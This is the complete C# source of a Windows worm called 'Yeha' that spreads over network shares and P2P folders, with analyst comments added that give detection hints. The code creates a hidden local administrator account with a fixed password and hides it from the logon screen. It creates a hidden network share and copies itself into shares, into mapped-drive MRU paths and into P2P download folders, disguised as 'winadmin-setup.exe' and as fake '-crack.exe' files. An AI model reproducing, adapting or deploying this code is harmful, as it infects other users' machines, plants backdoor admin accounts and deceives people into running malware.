
P2P-Worm.MSIL.Small.e - Source Code

  1.    /*************************************************************
  2.     * C# - MSIL.Yeha
  3.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  4.     * by free0n
  5.     * vx13d.net free0n@vx13d.net
  6.     * ###########################################################
  7.     *
  8.     * Yeha works by first checking itself in the registry
  9.     * if it hasn't ran yet it will attempt to create a
  10.     * new hidden local admin user account named Yeha with the
  11.     * password yehawashere. After the account is created
  12.     * it creates a new network share in C:\Yeha and makes the
  13.     * directory as hidden. This is so if someone is browsing
  14.     * the network we might lure them in. Each time the exe
  15.     * is run it will spread to any open network shares that
  16.     * were found in the mru list in the registry. It copies
  17.     * as winadmin-setup.exe.
  18.     *
  19.     * After the share spreading is completed it copies itself
  20.     * to commonly shared p2p folders as cracks for programs
  21.     * found in the program files directory. For example if
  22.     * Trilian directory is found it creates a trillian-crack.exe
  23.     * once the p2p is done it will display message if the day
  24.     * is the 25th that Yeha has been here if it's not it
  25.     * displays a common windows error message.
  26.     *
  27.     * Note: This uses the same trick as Snoopy did as
  28.     * it looks like a console application but the output
  29.     * type is windows application so we don't get a dorky
  30.     * cmd window popping up when it's ran. Compiled with
  31.     * MS Visual C# express
  32.     *
  33.     * thx RRLF!
  34.     * keep vxing!
  35.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  36.     ************************************************************/
  37.    /************************************************************
  38.     * Start of Program.cs
  39.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  40.     ************************************************************/
  41.  
  42.    using System;
  43.    using System.Collections.Generic;
  44.    using System.Text;
  45.    using System.Windows.Forms;
  46.    using System.IO;
  47.  
  48.    namespace Yeha {
  49.  
    class Program {

        /// <summary>
        /// Entry point. The registry gate (chkIt) decides whether the local
        /// account and the C:\Yeha share get created; the two spreading routines
        /// (Share, p2p) and the message box run on every launch regardless.
        /// </summary>
        /// <param name="args">Unused; nothing from the command line is read.</param>
        static void Main(string[] args) {

            Yeha yeha = new Yeha();
            // chkIt() returns true only when HKLM\SOFTWARE\Yeha resolves to the
            // literal "Yeha"; on every other outcome it writes the marker and the
            // account/share setup below is attempted. Both setup calls swallow
            // their own exceptions, so a failure here is silent.
            if (!yeha.chkIt()) {
                yeha.YehaUser();
                yeha.CreateShare(@"C:\Yeha", "Yeha");
            }

            // Self-copy is unconditional: local and MRU-mapped shares first,
            // then the p2p download folders. Neither chkIt() nor p2p() catches
            // exceptions, so an access-denied or failed copy ends the process here.
            yeha.Share();
            yeha.p2p();

            // Decoy dialog: a fake Win32 error box on every day except the 25th,
            // when "Yeha was here!" is shown instead. Either dialog is a visible
            // sign that the file was launched interactively.
            if (DateTime.Now.Day == 25) {
                MessageBox.Show("Yeha was here!", "Yeha", MessageBoxButtons.OK, MessageBoxIcon.Information);
            } else {
                MessageBox.Show("Not a valid win32 program", "Windows", MessageBoxButtons.OK, MessageBoxIcon.Error);
            }
        }
    }
  70.    }
  71.  
  72.    /************************************************************
  73.     * Start of Yeha.cs
  74.     * >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
  75.     ************************************************************/
  76.  
  77.    using System;
  78.    using System.Text;
  79.    using System.IO;
  80.    using System.Diagnostics;
  81.    using System.DirectoryServices;
  82.    using Microsoft.Win32;
  83.    using System.Collections;
  84.    using System.Collections.Generic;
  85.    using System.Management;
  86.  
  87.    namespace Yeha {
  88.  
    /// <summary>
    /// Worm body. Host artifacts it leaves, all visible in this file: the value
    /// HKLM\SOFTWARE\Yeha\Yeha (exe path), a local user "Yeha" in Administrators,
    /// a DWORD "Yeha"=0 under Winlogon\SpecialAccounts\UserList, a hidden folder
    /// C:\Yeha published as share "Yeha", and copies of the exe named
    /// winadmin-setup.exe (shares) and &lt;program&gt;-crack.exe (p2p folders).
    /// YehaUser, Share and CreateShare swallow every exception; chkIt and p2p
    /// do not.
    /// </summary>
    class Yeha {

        // Full path of the running executable; the source of every File.Copy below.
        private string me = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName);

        /// <summary>
        /// Registry gate keyed on HKLM\SOFTWARE\Yeha, value "Yeha". Returns true
        /// only when the lookup yields the literal "Yeha"; otherwise creates the
        /// key, stores the exe path in it and returns false.
        /// </summary>
        /// <returns>true if the marker read back as "Yeha"; false after writing it.</returns>
        public bool chkIt() {
            //checking the registry to see if we have already ran. If
            //we aren't found in the registry we add the value.
            //Hkey local machine is good real estate ;)

            // Registry.GetValue returns the third argument ("Yeha") only when the
            // key exists but has no "Yeha" value. A missing key yields null and an
            // existing value yields whatever was stored (the exe path written
            // below), so only the first of those cases compares equal to "Yeha".
            string regstr = (string)Registry.GetValue(@"HKEY_LOCAL_MACHINE\SOFTWARE\Yeha", "Yeha", "Yeha");
            if (regstr == "Yeha") {
                return true;
            } else {
                // Opening HKLM\Software writable normally needs administrative
                // rights; a denied open throws here, and nothing in this method
                // or in Main catches it.
                RegistryKey key = Registry.LocalMachine.OpenSubKey("Software", true);
                RegistryKey newkey = key.CreateSubKey("Yeha");
                newkey.SetValue("Yeha", me);
                return false;
            }
        }

        /// <summary>
        /// Copies the exe into six common download/shared folders (only those that
        /// exist), once per subdirectory of Program Files, under the name
        /// "&lt;subdirectory name&gt;-crack.exe". No exception handling.
        /// </summary>
        public void p2p() {

            //our p2p spreading is basically just a list of common folders
            //if the folder exists we drop a copies of ourselves as cracks
            //for programs we find the program files folder

            // Candidate drop folders, resolved for the current user via SpecialFolder.
            ArrayList arSharedFolders = new ArrayList();
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Downloads");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\My Shared Folder");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + "\\Shared");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\Ares\\My Shared Folder");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.Desktop) + "\\Downloads");
            arSharedFolders.Add(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + "\\Shareaza\\Downloads");

            IEnumerator folder = arSharedFolders.GetEnumerator();
            while (folder.MoveNext()) {
                string tada = Convert.ToString(folder.Current);
                if (Directory.Exists(tada)) {
                    string progDir = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
                    foreach (string d in Directory.GetDirectories(progDir)) {
                        // Substring from the last '\' with the '\' stripped = the last
                        // path segment of d, i.e. the program folder name.
                        // Detection hint: many same-size/same-hash *-crack.exe files
                        // appearing together in one of the folders above.
                        string app = tada + "\\" + d.Substring(d.LastIndexOf("\\")).Replace("\\", string.Empty) + "-crack.exe";
                        // No try/catch: a failed copy (read-only or locked target)
                        // propagates out of p2p() and, via Main, terminates the process.
                        File.Copy(me, app, true);
                    }
                }
            }
        }

        /// <summary>
        /// Creates local user "Yeha" with password "yehawashere" through the WinNT
        /// ADSI provider, adds it to the local Administrators group, then hides it
        /// from the logon UI via Winlogon\SpecialAccounts\UserList. Every failure
        /// is swallowed, so the caller cannot tell whether the account exists.
        /// </summary>
        public void YehaUser() {

            try {

                //create our new admin user account on the local machine we are running on.
                // Bound to the local computer object; Children.Add + SetPassword +
                // CommitChanges creates the account. This needs administrative
                // rights; a denied call throws into the outer catch and nothing is
                // created. Detection: local account creation and group-membership
                // change events (Security log 4720 / 4732) for a user named "Yeha".
                DirectoryEntry ad = new DirectoryEntry("WinNT://" + Environment.MachineName + ",computer");
                DirectoryEntry usr = ad.Children.Add("Yeha", "user");
                usr.Invoke("SetPassword", new object[] { "yehawashere" });
                usr.CommitChanges();

                DirectoryEntry de;
                de = ad.Children.Find("Administrators", "group");
                if (de != null) {
                    de.Invoke("Add", new object[] { usr.Path.ToString() });
                }

                //now we need to make the user hidden from the login screen and the
                //user accounts applet in the control panel to do this we
                //use a reg hack.

                // A DWORD 0 named after the account under SpecialAccounts\UserList
                // only hides it from the Welcome screen and the User Accounts applet;
                // the account remains a usable local administrator. Writes to this
                // key are a standard defense-evasion indicator worth monitoring.
                try {
                    string rkey = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList";
                    Registry.SetValue(rkey, "Yeha", 0, RegistryValueKind.DWord);
                } catch (Exception er) { }

                // Both handlers are catch-all with empty bodies: access-denied and
                // any other failure is indistinguishable from success.
            } catch (Exception ex) { }
        }

        /// <summary>
        /// Drops "winadmin-setup.exe" into every local share whose name has no '$'
        /// (enumerated via WMI Win32_Share) and into every path stored in the
        /// current user's "Map Network Drive MRU" list. Each half swallows
        /// its own exceptions.
        /// </summary>
        public void Share() {

            //copy ourselves to all the local network shares on the computer
            //this could be good bait when someone connects and wonders what
            //winadmin-setup is.

            try {
                // Shares containing '$' (the default admin/hidden shares) are
                // skipped, so only user-created shares receive a copy, addressed
                // through the loopback UNC path \\<machine>\<share>.
                ManagementObjectSearcher shares = new
                ManagementObjectSearcher("select * from win32_share");
                foreach (ManagementObject serv in shares.Get()) {
                    string shareName = Convert.ToString(serv["Name"]);
                    if (!shareName.Contains("$")) {
                        // No inner try: the first failed copy aborts this whole loop.
                        File.Copy(me, @"\\" + Environment.MachineName + @"\" + shareName + @"\winadmin-setup.exe", true);
                    }
                }
            } catch (Exception ex) { }

            //now we need to copy ourselves to other shares
            //on the network to do this we check for network shares
            //in the MRU list, we may get lucky we may not

            try {
                string key = @"Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\";
                // OpenSubKey returns null when the MRU key is absent; the following
                // GetValueNames() then throws NullReferenceException into the catch below.
                RegistryKey reg = Registry.CurrentUser.OpenSubKey(key); ;
                foreach (string valuename in reg.GetValueNames()) {
                    // Read before the name filter, so the "MRUList" value is read too (unused).
                    string path = reg.GetValue(valuename).ToString();
                    // "MRUList" holds the ordering string, not a path; compared
                    // case-insensitively via ToLower().
                    if (valuename.ToLower() != "mrulist") {
                        try {
                            // Verbatim @"\\" is two literal backslashes, so the target
                            // is <path>\\winadmin-setup.exe (doubled separator).
                            File.Copy(me, path + @"\\winadmin-setup.exe", true);
                        } catch (Exception er) {
                            // Unreachable or read-only share: skip to the next MRU entry.
                            continue;
                        }
                    }
                }
                reg.Close();
            } catch (Exception er) { }
        }

        /// <summary>
        /// Creates <paramref name="dir"/> on disk, publishes it as a disk share
        /// named <paramref name="name"/> through WMI Win32_Share.Create, and on
        /// success sets the Hidden attribute on the local folder. Exceptions are
        /// swallowed.
        /// </summary>
        /// <param name="dir">Local directory to create and share (Main passes C:\Yeha).</param>
        /// <param name="name">Share name, also used as its description (Main passes "Yeha").</param>
        public void CreateShare(string dir, string name) {

            //we create our own shared folder on the network called Yeha
            //this is so if we get a user browsing the network they might
            //open it up and double click winadmin-setup.exe. You know a user
            //might be more susceptible to pick it up if the folder was
            //named pr0n or porn hehehe.

            try {
                Directory.CreateDirectory(dir);
                // Win32_Share.Create via WMI; Type 0x0 is a disk-drive share.
                // Creating a share needs administrative rights; a denied call
                // throws into the catch below. Detection: a new share named
                // "Yeha" whose path is a hidden directory.
                ManagementClass managementClass = new ManagementClass("Win32_Share");
                ManagementBaseObject inParams = managementClass.GetMethodParameters("Create");
                ManagementBaseObject outParams;
                inParams["Description"] = name;
                inParams["Name"] = name;
                inParams["Path"] = dir;
                inParams["Type"] = 0x0;
                outParams = managementClass.InvokeMethod("Create", inParams, null);

                //if the return value was 0 then we know we got the folder created
                //so we are going to make it hidden..
                // The (uint) cast assumes the WMI ReturnValue is boxed as an unsigned
                // 32-bit value; 0 means the share was created.
                if ((uint)(outParams.Properties["ReturnValue"].Value) == 0) {
                    //make the dir hidden
                    // Assigning Attributes replaces the attribute set with Hidden
                    // rather than OR-ing the flag in. Only the local folder is
                    // hidden; the share name carries no '$', so it stays browsable.
                    if (Directory.Exists(dir)) {
                        DirectoryInfo d = new DirectoryInfo(dir);
                        d.Attributes = FileAttributes.Hidden;
                    }
                }

            } catch (Exception e) { }
        }
    }
  234.    }
  235.  
  236.  
  237.  